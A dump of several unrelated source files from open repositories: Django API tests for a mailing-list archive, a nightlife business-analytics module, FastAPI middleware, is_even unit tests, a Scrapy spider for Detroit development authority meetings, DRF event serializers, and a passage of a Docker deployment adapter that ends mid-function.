"BSD-3-Clause"
] | 5 | 2022-03-11T09:39:47.000Z | 2022-03-30T16:48:09.000Z | backend/mlarchive/tests/archive/api.py | dkg/mailarch | 562757c09e212c202c35231d7e7c588cd4d3fb65 | [
"BSD-3-Clause"
] | 4 | 2022-03-04T15:36:19.000Z | 2022-03-28T23:45:44.000Z | import datetime
import pytest
from django.urls import reverse
from factories import EmailListFactory, MessageFactory
@pytest.mark.django_db(transaction=True)
def test_msg_counts_one_list(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
@pytest.mark.django_db(transaction=True)
def test_msg_counts_two_lists(client, messages):
url = reverse('api_msg_counts') + '?list=pubone,pubtwo&start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
assert 'pubtwo' in data['msg_counts']
assert data['msg_counts']['pubtwo'] == 2
@pytest.mark.django_db(transaction=True)
def test_msg_counts_unknown_list(client, messages):
url = reverse('api_msg_counts') + '?list=balloons&start=20130101'
response = client.get(url)
data = response.json()
assert response.status_code == 404
assert data == {'error': 'list not found'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_private_list(client, messages):
url = reverse('api_msg_counts') + '?list=private&start=20130101'
response = client.get(url)
data = response.json()
assert response.status_code == 404
assert data == {'error': 'list not found'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_no_list(client, messages):
'''Should return all public lists, no private'''
url = reverse('api_msg_counts') + '?start=20130101'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 5
assert 'pubtwo' in data['msg_counts']
assert data['msg_counts']['pubtwo'] == 2
assert 'private' not in data['msg_counts']
@pytest.mark.django_db(transaction=True)
def test_msg_counts_no_date(client, messages):
'''If no date provided return last month'''
pubfour = EmailListFactory.create(name='pubfour')
date = datetime.datetime.now().replace(second=0, microsecond=0)
MessageFactory.create(email_list=pubfour, date=date - datetime.timedelta(days=14))
MessageFactory.create(email_list=pubfour, date=date - datetime.timedelta(days=35))
url = reverse('api_msg_counts') + '?list=pubfour'
response = client.get(url)
data = response.json()
assert 'pubfour' in data['msg_counts']
assert data['msg_counts']['pubfour'] == 1
@pytest.mark.django_db(transaction=True)
def test_msg_counts_start(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130601'
response = client.get(url)
data = response.json()
assert 'start' in data
assert data['start'] == '20130601'
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 2
@pytest.mark.django_db(transaction=True)
def test_msg_counts_start_bad(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=142'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid start date'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_end(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&end=20130601'
response = client.get(url)
data = response.json()
assert 'end' in data
assert data['end'] == '20130601'
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 3
@pytest.mark.django_db(transaction=True)
def test_msg_counts_end_bad(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20200101&end=142'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid end date'}
@pytest.mark.django_db(transaction=True)
def test_msg_counts_invalid_date(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&end=invalid'
response = client.get(url)
data = response.json()
assert 'error' in data
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_months(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1months'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 1
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_years(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1years'
response = client.get(url)
data = response.json()
assert 'pubone' in data['msg_counts']
assert data['msg_counts']['pubone'] == 3
@pytest.mark.django_db(transaction=True)
def test_msg_counts_duration_invalid(client, messages):
url = reverse('api_msg_counts') + '?list=pubone&start=20130101&duration=1eon'
response = client.get(url)
data = response.json()
assert response.status_code == 400
assert data == {'error': 'invalid duration'} | 35.972414 | 87 | 0.69536 |
77df64ac224bd353ad098167ec2418d1526e349a | 6,612 | py | Python | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | business.py | Javierd/NightLive-Server | 7323cda2a76ca1181d82fc9f76599d0492886721 | [
"MIT"
] | null | null | null | import time
import userDatabase as userDB
import locationsDatabase as locationsDB
import placesDatabase as placesDB
import utils
ageLabels = ['-18', '18-22', '23-28', '29-35', '36-40', '41-50', '51-60', '61-70', '+70']
sexLabels = ['Man', 'Woman', 'Other']
ageBgColors = ['rgba(255, 167, 38, 1)',
'rgba(239, 83, 80, 1)',
'rgba(171, 71, 188, 1)',
'rgba(255, 193, 7, 1)',
'rgba(92, 107, 192, 1)',
'rgba(66, 165, 245, 1)',
'rgba(38, 198, 218, 1)',
'rgba(102, 187, 106, 1)',
'rgba(212, 225, 87, 1)']
sexBgColors = [ 'rgba(66, 165, 245, 1)',
'rgba(236, 64, 122, 1)',
'rgba(171, 71, 188, 1)']
ageBorderColors = ['rgba(0, 0, 0, 0.7)',
'rgba(0, 0, 0, 0.7)',
'rgba(255, 206, 86, 0.7)',
'rgba(75, 192, 192, 0.7)',
'rgba(153, 102, 255, 0.7)',
'rgba(5, 192, 192, 0.7)',
'rgba(75, 192, 12, 0.7)',
'rgba(75, 1, 192, 0.7)',
'rgba(255, 159, 64, 0.7)']
sexBorderColors = ['rgba(0, 0, 0, 0.7)',
'rgba(0, 0, 0, 0.7)',
'rgba(255, 206, 86, 0.7)']
def businessSignIn(conn, mail, password):
#0 = OK, 1 = Wrong user name, 2 = wrong password
c = conn.cursor()
c.execute("SELECT password, token, id FROM business WHERE mail = ?", (mail,))
dbPass = c.fetchone()
if(dbPass == None):
return 1
if not bcrypt.checkpw(password.encode('utf8'), dbPass[0]):
return 2
return 0
def businessSignUp(conn, place, password, mail):
#0 = OK, 1 = username in use, 2 = email in use, 3 = Wrong email, 4 = other error
c = conn.cursor()
#Check if user name or email are already used
c.execute("SELECT * FROM business WHERE id = ?", (name,))
if(len(c.fetchall()) != 0):
return 1
c.execute("SELECT id FROM business WHERE mail = ?", (mail,))
if(len(c.fetchall()) != 0):
return 2
hashedPass = bcrypt.hashpw(password.encode('utf8'), bcrypt.gensalt())
token = hashlib.sha256((name+password).encode('utf8')).hexdigest()
t = (place, mail, hashedPass, str(token))
c.execute("INSERT INTO business(placeId, mail, password, token) VALUES (?, ?, ?, ?)", t)
conn.commit()
return 0
def authenticateBusiness(conn, placeId, token):
c = conn.cursor()
c.execute("SELECT token FROM business WHERE id = ?", (placeId,))
dbPass = c.fetchone()
if(dbPass == None):
return False
if(token != dbPass[0]):
return False
return True
#TODO change startTime and endTime wih the local opening and closing hours
def getBusinessUserData(conn, placeId, days):
#TODO
"""if(authenticateBusiness(conn, placeId, token) == False):
return 1"""
dateTS = utils.timeInMillis()
usersInfo = []
usersAge = [0, 0, 0, 0, 0, 0, 0, 0, 0]
usersSex = [0, 0, 0]
#TODO Allow multiple timestamps
startTimestamp = dateTS - days*24*3600*1000
location = placesDB.getPlaceLocation(conn, placeId)
if(location == None):
return "The place doesn't exists"
#Get all the users that were arround that location since the timestamp (24h)
#TODO Change the 100m number
lat = location[0]
lng = location[1]
radius = 100
#1.1m * radius
maxLat = lat + 0.00001 * radius
minLat = lat - 0.00001 * radius
maxLng = lng + 0.00001 * radius
minLng = lng - 0.00001 * radius
t = (startTimestamp, dateTS, maxLat, minLat, maxLng, minLng)
c = conn.cursor()
c.execute("""SELECT sex, birthdate, styles FROM users
WHERE id IN (
SELECT user
FROM locations
WHERE timestamp >= ? AND timestamp <= ?
AND latitude <= ? AND latitude >= ? AND longitude <= ? AND longitude >= ?
GROUP BY user)""", t)
#From each user, get the age and sort from -18, 18-22, 23-28- 29-35- 36-40, 41-50, 51-60, 61-70, +70
for user in c.fetchall():
age = int ((dateTS - user[1])/(1000 * 3600 * 24 *365))
#Sex
if user[0] == 0:
usersSex[0] +=1
elif user[0] == 1:
usersSex[1] +=1
elif user[0] == 2:
usersSex[2] +=1
#Ages
if age > 70:
usersAge[8] += 1
elif age > 60:
usersAge[7] += 1
elif age > 50:
usersAge[6] += 1
elif age > 40:
usersAge[5] += 1
elif age > 35:
usersAge[4] += 1
elif age > 29:
usersAge[3] += 1
elif age > 23:
usersAge[2] += 1
elif age > 18:
usersAge[1] += 1
else:
usersAge[0] += 1
usersInfo.append(usersSex)
usersInfo.append(usersAge)
return usersInfo
def getBusinessInflowData(conn, placeId, days):
#TODO
"""if(authenticateBusiness(conn, placeId, token) == False):
return 1"""
nowTimestamp = utils.dayInMillis()
inflowDataValues = []
inflowDataLabels = []
location = placesDB.getPlaceLocation(conn, placeId)
if(location == None):
return "The place doesn't exists"
#Get the number of users that were arround that location between the two timestamps
#TODO Change the 100m number
for i in reversed(range(0, days+1)):
startTimestamp = nowTimestamp - (i+1)*24*3600*1000
endTimestamp = nowTimestamp - i*24*3600*1000
numUsers = locationsDB.getNumUsersArround(conn, location[0], location[1], 100, startTimestamp, endTimestamp)
dateStr = utils.millisToDate(startTimestamp, "%m/%d/%Y")
inflowDataValues.append(numUsers)
inflowDataLabels.append(dateStr)
return [inflowDataLabels, inflowDataValues]
def businessPostFlyer(conn, name, placeId, token, price, currency, imageUrl, color, qrCode, info, startTimestamp, endTimestamp):
#TODO Borrar token!=None, solo para pruebas sin tener que pasar el token
if(token!=None and authenticateBusiness(conn, placeId, token) == False):
return 1
c = conn.cursor()
t=(name, placeId, price, currency, imageUrl, color, qrCode, info, startTimestamp, endTimestamp)
print(t)
#Make sure the price is a real
c.execute("""INSERT INTO flyers(name, placeId, price, currency, image, color, qr, info, startTimestamp, endTimestamp)
VALUES (?, ?, REPLACE(?, ',', '.'), ?, ?, ?, ?, ?, ?, ?)""", t)
conn.commit()
return 0
#TODO This is for the users, so we need to add user authentication, not business authentication
#TODO Check if the place exists (maybe, anyway, it wont return an error)
def businessGetUsersFlyers(conn, placeId):
flyers = []
c = conn.cursor()
timestamp = utils.timeInMillis()
c.execute("""SELECT name, price, currency, image, color, qr, info, startTimestamp, endTimestamp FROM flyers WHERE placeId = ? AND
startTimestamp <= ? AND endTimestamp >= ? """, (placeId, timestamp, timestamp))
for i in c.fetchall():
flyer = utils.setUpFlyer(i[0], i[1], i[2], utils.SERVER_URL + i[3], i[4], i[5], i[6], i[7], i[8])
flyers.append(flyer)
return flyers | 29.783784 | 130 | 0.624168 |
5b4534dc86dac131d7395d47ea8825b4b4e2657a | 3,296 | py | Python | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | hibiapi/app/middlewares.py | wukibaka/HibiAPI | 60f40b071d16d901215a0e3d7dd84f888e8064bb | [
"Apache-2.0"
] | null | null | null | from datetime import datetime
from typing import Awaitable, Callable, List
from fastapi import Request, Response
from fastapi.middleware.cors import CORSMiddleware
from fastapi.middleware.gzip import GZipMiddleware
from fastapi.middleware.trustedhost import TrustedHostMiddleware
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
from sentry_sdk.integrations.httpx import HttpxIntegration
from starlette.datastructures import MutableHeaders
from hibiapi.utils.config import Config
from hibiapi.utils.exceptions import BaseServerException, UncaughtException
from hibiapi.utils.log import LoguruHandler, logger
from hibiapi.utils.routing import request_headers, response_headers
from .application import app
from .handlers import exception_handler
RequestHandler = Callable[[Request], Awaitable[Response]]
if Config["server"]["gzip"].as_bool():
app.add_middleware(GZipMiddleware)
app.add_middleware(
CORSMiddleware,
allow_origins=Config["server"]["cors"]["origins"].get(List[str]),
allow_credentials=Config["server"]["cors"]["credentials"].as_bool(),
allow_methods=Config["server"]["cors"]["methods"].get(List[str]),
allow_headers=Config["server"]["cors"]["headers"].get(List[str]),
)
app.add_middleware(
TrustedHostMiddleware,
allowed_hosts=Config["server"]["allowed"].get(List[str]),
)
app.add_middleware(SentryAsgiMiddleware)
HttpxIntegration.setup_once()
@app.middleware("http")
async def request_logger(request: Request, call_next: RequestHandler) -> Response:
start_time = datetime.now()
host, port = request.client
response = await call_next(request)
process_time = (datetime.now() - start_time).total_seconds() * 1000
response_headers.get().setdefault("X-Process-Time", f"{process_time:.3f}")
bg, fg = (
("green", "red")
if response.status_code < 400
else ("yellow", "blue")
if response.status_code < 500
else ("red", "green")
)
status_code, method = response.status_code, request.method.upper()
user_agent = (
LoguruHandler.escape_tag(request.headers["user-agent"])
if "user-agent" in request.headers
else "<d>Unknown</d>"
)
logger.info(
f"<m><b>{host}</b>:{port}</m>"
f" | <{bg.upper()}><b><{fg}>{method}</{fg}></b></{bg.upper()}>"
f" | <n><b>{str(request.url)!r}</b></n>"
f" | <c>{process_time:.3f}ms</c>"
f" | <e>{user_agent}</e>"
f" | <b><{bg}>{status_code}</{bg}></b>"
)
return response
@app.middleware("http")
async def contextvar_setter(request: Request, call_next: RequestHandler):
request_headers.set(request.headers)
response_headers.set(MutableHeaders())
response = await call_next(request)
response.headers.update({**response_headers.get()})
return response
@app.middleware("http")
async def uncaught_exception_handler(
request: Request, call_next: RequestHandler
) -> Response:
try:
response = await call_next(request)
except Exception as error:
response = await exception_handler(
request,
exc=(
error
if isinstance(error, BaseServerException)
else UncaughtException.with_exception(error)
),
)
return response
| 33.979381 | 82 | 0.68932 |
b2ea4a6411607eb4f804dc76108aec6d314f8243 | 1,490 | py | Python | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 45 | 2021-04-02T22:19:49.000Z | 2022-02-01T15:38:33.000Z | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 20 | 2021-04-03T10:06:51.000Z | 2021-08-20T22:46:23.000Z | test_is_even.py | rosineygp/PyIsEven | 17b78128e42a8bf8b212cb582f376f9acf641dd1 | [
"MIT"
] | 11 | 2021-04-02T17:25:46.000Z | 2021-12-14T03:28:30.000Z | import unittest
from sys import version_info
from is_even import is_even
class TestIsEven(unittest.TestCase):
def test_even(self):
even = is_even.is_even(2)
self.assertTrue(even)
def test_odd(self):
odd = is_even.is_odd(3)
self.assertTrue(odd)
def test_not_even(self):
even = is_even.is_even(3)
self.assertFalse(even)
def test_not_odd(self):
even = is_even.is_odd(2)
self.assertFalse(even)
def test_cache(self):
self.assertTrue(is_even.is_even(2))
self.assertFalse(is_even.is_even(3))
def test_negative(self):
with self.assertRaises(Exception):
is_even.is_even(-10)
def test_failback_even(self):
v = 2
if version_info >= (3, 0):
even = list(is_even._is_even(v))[-1]
else:
even = is_even._is_even(v)
self.assertTrue(even)
def test_failback_odd(self):
v = 3
if version_info >= (3, 0):
odd = list(is_even._is_even(v))[-1]
else:
odd = is_even._is_even(v)
self.assertFalse(odd)
def test_ad(self):
if version_info >= (3, 0):
v = is_even.is_even(0)
self.assertTrue(isinstance(v.ad, str))
def test_ad_cached(self):
v = is_even.is_even(0)
y = is_even.is_even(0)
if version_info >= (3, 0):
self.assertEqual(v.ad, y.ad)
if __name__ == "__main__":
unittest.main()
| 24.032258 | 50 | 0.579866 |
ba6228799a4a396858109b5b37b5434b9afd3565 | 5,040 | py | Python | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | city_scrapers/spiders/det_downtown_development_authority.py | noahkconley/city-scrapers | 37420ce3a9295c2aac68c0fb4a957ad41394a801 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
from collections import defaultdict
from dateutil.parser import parse
from city_scrapers.spider import Spider
class DetDowntownDevelopmentAuthoritySpider(Spider):
name = 'det_downtown_development_authority'
agency_id = 'Downtown Development Authority'
timezone = 'America/Detroit'
allowed_domains = ['www.degc.org']
start_urls = ['http://www.degc.org/public-authorities/dda/']
def parse(self, response):
"""
`parse` should always `yield` a dict that follows the Event Schema
<https://city-bureau.github.io/city-scrapers/06_event_schema.html>.
Change the `_parse_id`, `_parse_name`, etc methods to fit your scraping
needs.
"""
yield from self._prev_meetings(response)
yield from self._next_meeting(response)
def _next_meeting(self, response):
next_meeting_xpath = '//text()[contains(., "The next Regular DDA Board meeting is")]'
next_meeting_text = ' '.join(response.xpath(next_meeting_xpath).extract())
data = self._set_meeting_defaults(response)
data['start'] = self._parse_start(next_meeting_text)
data['documents'] = self._parse_docs(response, data['start']['date'])
data['status'] = self._generate_status(data, text='')
data['id'] = self._generate_id(data)
yield data
def _prev_meetings(self, response):
prev_meetings_xpath = '//a[contains(., "Agendas and Minutes")]'
prev_meetings = response.xpath(prev_meetings_xpath)
for a in prev_meetings:
yield response.follow(a, callback=self._parse_prev_meetings)
@staticmethod
def _parse_start(date_time_text):
try:
dt = parse(date_time_text, fuzzy=True)
return {'date': dt.date(), 'time': dt.time(), 'note': ''}
except ValueError:
return {'date': None, 'time': None, 'note': ''}
def _parse_prev_meetings(self, response):
# there are only documents for prev meetings,
# so use these to create prev meetings
prev_meeting_docs = self._parse_prev_docs(response)
for meeting_date in prev_meeting_docs:
data = self._set_meeting_defaults(response)
data['start'] = {'date': meeting_date.date(), 'time': None, 'note': ''}
data['documents'] = prev_meeting_docs[meeting_date]
data['status'] = self._generate_status(data, text='')
data['id'] = self._generate_id(data)
yield data
def _parse_prev_docs(self, response):
docs = defaultdict(list)
links = response.css('li.linksGroup-item a')
for link in links:
link_text = link.xpath("span/text()").extract_first('')
is_date = self._parse_date(link_text)
if is_date:
dt = parse(is_date.group(1), fuzzy=True)
document = self._create_document(link)
docs[dt].append(document)
return docs
def _parse_docs(self, response, meeting_date):
docs = []
doc_links = response.xpath("//a[span/text()[contains(., 'Agenda')]]")
for link in doc_links:
# meeting details and docs are in separate places,
# so find the docs that match meeting_date
if self._matches_meeting_date(link, meeting_date):
document = self._create_document(link)
docs.append(document)
return docs
def _create_document(self, link):
link_text = link.xpath('span/text()').extract_first('')
date = self._parse_date(link_text).group(1)
desc = link_text.split(date)[-1]
url = link.xpath("@href").extract_first('')
if 'AGENDA' in desc.upper():
return {'url': url, 'note': 'agenda'}
if 'MINUTES' in desc.upper():
return {'url': url, 'note': 'minutes'}
return {'url': url, 'note': desc.lower().strip()}
def _matches_meeting_date(self, link, meeting_date):
link_text = link.xpath('span/text()').extract_first('')
if self._parse_date(link_text):
agenda_date = parse(link_text, fuzzy=True)
if agenda_date.date() == meeting_date:
return True
return False
@staticmethod
def _parse_date(text):
date_regex = re.compile(r'([A-z]+ [0-3]?[0-9], \d{4})')
return date_regex.search(text)
@staticmethod
def _set_meeting_defaults(response):
data = {
'_type': 'event',
'name': 'Board of Directors',
'event_description': '',
'classification': 'Board',
'end': {'date': None, 'time': None, 'note': ''},
'all_day': False,
'location': {
'neighborhood': '',
'name': 'DEGC, Guardian Building',
'address': '500 Griswold, Suite 2200, Detroit'
},
'documents': [],
'sources': [{'url': response.url, 'note': ''}]
}
return data
| 39.069767 | 93 | 0.59623 |
92b99b0da118b2dd8dccdef8a52408aebe6b49d4 | 2,272 | py | Python | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 32 | 2017-02-22T13:38:38.000Z | 2022-03-31T23:29:54.000Z | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 694 | 2017-02-15T23:09:52.000Z | 2022-03-31T23:16:07.000Z | apps/events/serializers.py | Kpaubert/onlineweb4 | 9ac79f163bc3a816db57ffa8477ea88770d97807 | [
"MIT"
] | 35 | 2017-09-02T21:13:09.000Z | 2022-02-21T11:30:30.000Z | import logging
from rest_framework import serializers
from apps.companyprofile.serializers import CompanySerializer
from apps.events.models import AttendanceEvent, CompanyEvent, Event, Extras, RuleBundle
from apps.gallery.serializers import ResponsiveImageSerializer
logger = logging.getLogger(__name__)
class ExtrasSerializer(serializers.ModelSerializer):
class Meta:
model = Extras
fields = ("id", "choice", "note")
class RuleBundleSerializer(serializers.ModelSerializer):
class Meta:
model = RuleBundle
fields = (
"description",
"field_of_study_rules",
"grade_rules",
"user_group_rules",
"rule_strings",
"id",
)
class AttendanceEventSerializer(serializers.ModelSerializer):
rule_bundles = RuleBundleSerializer(many=True)
extras = ExtrasSerializer(many=True)
class Meta:
model = AttendanceEvent
fields = (
"id",
"max_capacity",
"waitlist",
"guest_attendance",
"registration_start",
"registration_end",
"unattend_deadline",
"automatically_set_marks",
"rule_bundles",
"number_on_waitlist",
"number_of_seats_taken",
"extras",
)
class CompanyEventSerializer(serializers.ModelSerializer):
company = CompanySerializer()
class Meta:
model = CompanyEvent
fields = ("company", "event")
class EventSerializer(serializers.ModelSerializer):
absolute_url = serializers.CharField(source="get_absolute_url", read_only=True)
attendance_event = AttendanceEventSerializer()
company_event = CompanyEventSerializer(many=True)
image = ResponsiveImageSerializer()
class Meta:
model = Event
fields = (
"absolute_url",
"attendance_event",
"company_event",
"description",
"event_start",
"event_end",
"event_type",
"id",
"image",
"ingress",
"ingress_short",
"location",
"slug",
"title",
"organizer_name",
"organizer",
)
| 26.114943 | 87 | 0.596391 |
30f4d5f92e36aece82f45592ccbb67b07ee1dd1b | 16,368 | py | Python | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | null | null | null | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | 18 | 2017-10-25T08:17:24.000Z | 2019-12-10T08:43:45.000Z | lifecycle/modules/apps/docker/adapter.py | mF2C/LifecycleManagement | a9661c6dcaad94564c3e00d6059b9c0713b3f3c0 | [
"Apache-2.0"
] | null | null | null | """
Docker adapter
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 09 feb. 2018
@author: Roi Sucasas - ATOS
"""
from lifecycle.modules.apps.docker import client as docker_client
from lifecycle import common as common
from lifecycle.data import data_adapter as data_adapter
import uuid, os, time
import urllib.request as urequest
from lifecycle.data.common import db as db #import SERVICE_INSTANCES_LIST
from lifecycle.logs import LOG
import config
from lifecycle.common import OPERATION_START, OPERATION_STOP, OPERATION_TERMINATE, \
STATUS_ERROR, STATUS_WAITING, STATUS_STARTED, STATUS_STOPPED, STATUS_ERROR_STARTING, STATUS_ERROR_STOPPING, \
STATUS_TERMINATED, STATUS_UNKNOWN, SERVICE_DOCKER, SERVICE_DOCKER_COMPOSE, SERVICE_COMPSS
'''
Data managed by this component:
-----------------------------------------------------------------------------------------------
SERVICE INSTANCE:
{
...
"id": "",
"user_id": "testuser",
"service_id": "",
"agreement_id": "",
"status": "waiting",
"agents": [
{"agent": resource-link, "url": "192.168.1.31", "ports": [8081], "container_id": "10asd673f", "status": "waiting",
"num_cpus": 3, "allow": true, "master_compss": false},
{"agent": resource-link, "url": "192.168.1.34", "ports": [8081], "container_id": "99asd673f", "status": "waiting",
"num_cpus": 2, "allow": true, "master_compss": false}
]
}
Agent example: {"agent": resource-link, "url": "192.168.1.31", "ports": {8081}, "container_id": "10asd673f",
"status": "waiting", "num_cpus": 3, "allow": true, "master_compss": false}
'''
###############################################################################
# DEPLOYMENT:
# deploy_docker_image:
def __deploy_docker_image(service, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] " + str(service) + ", " + str(agent))
try:
# service image / location. Examples: "yeasy/simple-web"
service_image = service['exec']
# service_name examples: "simple-web-test"
service_name = service['name'] + "-" + str(uuid.uuid4())
# command. Docker examples: "/bin/sh -c 'python index.py'"
service_command = ""
# port(s)
ports = agent['ports']
container1 = docker_client.create_docker_container(service_image, service_name, service_command, ports)
if container1 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER,
"container_main": container1['Id'],
"container_2": "-"
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] container: " + str(container1))
# update agent properties
agent['container_id'] = container1['Id']
agent['agent_param'] = "-"
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_image] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_image()', 'agent', str(agent), 'service', str(service))
# deploy_docker_compss:
def __deploy_docker_compss(service, service_instance, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] " + str(service) + ", " + str(agent))
try:
# service image / location. Examples: "mf2c/compss-agent:latest", "mf2c/compss-mf2c:1.0"
service_image = service['exec']
# port(s); COMPSs exposes port 8080
ports = agent['ports']
# ip
ip = agent['url']
# ip_leader
ip_leader = service_instance['device_ip'] # TODO create a 'exec_device_ip'
container1, agents_ports = docker_client.create_docker_compss_container(service_image, ip, ports, ip_leader)
if container1 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_COMPSS,
"container_main": container1['Id'],
"container_2": "-"
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] container: " + str(container1))
# update agent properties
agent['container_id'] = container1['Id']
agent['agent_param'] = "-"
agent['ports'] = agents_ports
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
return common.gen_response(500, 'Error when connecting to DOCKER API', 'agent', str(agent), 'service', str(service))
except:
LOG.exception('[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compss] Exception')
return common.gen_response(500, 'Exception: __deploy_docker_compss()', 'agent', str(agent), 'service', str(service))
# deploy_docker_compose:
# Command: sudo docker run -v /var/run/docker.sock:/var/run/docker.sock
# -v /home/atos/mF2C/compose_examples:/home/atos/mF2C/compose_examples
# -w="/home/atos/mF2C/compose_examples" docker/compose:1.21.0 up
def __deploy_docker_compose(service, agent):
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] " + str(service) + ", " + str(agent))
try:
# 1. Download docker-compose.yml file
location = service['exec']
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Getting docker-compose.yml from " + location + " ...")
# remove previous files
try:
os.remove(config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
except:
LOG.warning("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Error when removing file: " + config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
# download docker-compose.yml
try:
res, _ = urequest.urlretrieve(location, config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] > download result: " + str(res))
except:
LOG.exception("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Error when downloading file to: " + config.dic['WORKING_DIR_VOLUME'] + "/docker-compose.yml")
return common.gen_response(500, "Exception: deploy_docker_compose(): Error when downloading file to WORKING_DIR_VOLUME",
"agent", str(agent),
"WORKING_DIR_VOLUME", config.dic['WORKING_DIR_VOLUME'])
# 2. Deploy container
service_name = service['name'] + "-" + str(uuid.uuid4()) # service_name
service_command = "up" # command
# container 1 => command 'up'
container1 = docker_client.create_docker_compose_container(service_name, service_command)
if container1 is not None:
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container1: " + str(container1))
# container 2 => command 'down'
container2 = docker_client.create_docker_compose_container(service_name + "-" + str(uuid.uuid4()), "down")
if container2 is not None:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER_COMPOSE,
"container_main": container1['Id'],
"container_2": container2['Id']
})
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container2: " + str(container2))
LOG.debug("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container '1' & '2' created")
agent['agent_param'] = container2['Id']
else:
db.SERVICE_INSTANCES_LIST.append({
"type": SERVICE_DOCKER_COMPOSE,
"container_main": container1['Id'],
"container_2": 'error'
})
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] container '2' not created")
agent['agent_param'] = "-"
# update agent properties
agent['container_id'] = container1['Id']
agent['status'] = STATUS_WAITING
return common.gen_response_ok('Deploy service in agent', 'agent', str(agent), 'service', str(service))
else:
LOG.error("[lifecycle.modules.apps.docker.adapter] [__deploy_docker_compose] Could not connect to DOCKER API")
agent['status'] = STATUS_ERROR
